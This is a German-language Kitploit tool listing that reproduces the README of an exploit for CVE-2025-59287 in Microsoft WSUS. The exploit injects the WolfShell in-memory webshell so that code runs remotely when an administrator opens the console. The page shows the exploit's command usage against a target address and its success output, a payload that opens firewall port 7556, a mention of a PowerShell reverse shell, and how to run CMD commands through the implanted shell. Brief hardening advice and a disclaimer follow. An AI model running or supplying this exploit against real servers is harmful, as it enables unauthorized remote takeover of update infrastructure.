Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-59287 — Exploit für CVE-2025-59287, der eine WolfShell-In-Memory-Webshell in WSUS-Server injiziert, um Remote-Code-Ausführung zu erreichen, wenn die Administrationskonsole geöffnet wird. | Kitploit
Tools/GitHubGitHub/0x7556/cve-2025-59287
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHub0x7556/cve-2025-59287

CVE-2025-59287

Exploit für CVE-2025-59287, der eine WolfShell-In-Memory-Webshell in WSUS-Server injiziert, um Remote-Code-Ausführung zu erreichen, wenn die Administrationskonsole geöffnet wird.

Repository anzeigen
73vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59287 WSUS-Schwachstellen-Reproduktion

CVE-2025-59287 — Injektion von WolfShell Wolverine Forward Memory Shell

Übersicht

CVE-2025-59287 nutzt einen Logikfehler in WSUS-bezogenen Komponenten aus, um die WolfShell-Memory-Shell in den Zielserver zu injizieren. Wenn ein Administrator die WSUS-Konsole öffnet (standardmäßig wird sie innerhalb von 1–30 Minuten zufällig ausgelöst), wird die Memory-Shell aktiviert und führt zu Remote Code Execution (RCE). Dieses Dokument enthält Nutzungsbeispiele, benötigte Dateien und Schutzempfehlungen.

Verwendungsbeispiele

Verwendung

Senden Sie ein ysoserial.net-Deserialisierungs-Payload an den Zielserver, Funktion individuell anpassbar. Dieses Projekt demonstriert die Injektion der Wolverine-Memory-Shell

root@kitploit:~
Usage: CVE-2025-59287 <target_url> <payload_file>

Beispiel für die Injektion der Wolverine-WebShell-ASPX-Shell

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt

Beispiel für die Injektion der Wolverine-WolfShell-Forward-Shell in den Speicher

root@kitploit:~
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters

[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS

Beispiel für die Firewall-Freigabe von Port 7556

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

exp

PowerShell-Reverse-Shell

win2019 Defender blockiert und löscht, nicht verwendbar Defende

Öffnen der WSUS-Konsole zum Auslösen der Schwachstelle

Wie im Bild gezeigt, wird Port 7556 erfolgreich abgehört, was bedeutet, dass die Wolverine-Memory-Forward-Shell injiziert wurde WolfDoor 1

Wolverine verbindet sich mit der Memory-Shell und führt CMD-Befehle aus

WolfDoor 2

Schutzempfehlungen

  • Wenden Sie umgehend vom Hersteller bereitgestellte Patches oder temporäre Abhilfemaßnahmen auf betroffene WSUS-Server an.
  • Überprüfen und entfernen Sie verdächtige Clients in WSUS (z. B. hawktrace.local).
  • Beschränken und protokollieren Sie den Zugriff auf die WSUS-Verwaltungskonsole, um sicherzustellen, dass nur vertrauenswürdige Administratoren Zugriff haben.
  • Verwenden Sie Tools zur Erkennung von Eindringlingen, Speicherscans und Host-Integritätsüberwachung, um anomale Memory-Shells oder verdächtige Module zu erkennen.
  • Vermeiden Sie es, die WSUS-Konsole in nicht vertrauenswürdigen Umgebungen zu öffnen oder verdächtige Update-Elemente zu verarbeiten, bis der Patch installiert ist.

Haftungsausschluss

Dieses Dokument dient ausschließlich Sicherheitsforschung und Schutzzwecken. Verwenden Sie die zugehörigen Exploit-Codes nicht für nicht autorisierte Systeme oder Angriffsaktivitäten.

Referenzlinks

https://github.com/0x7556/wolfshell https://github.com/0x7556/CVE-2025-59287

Tool herunterladen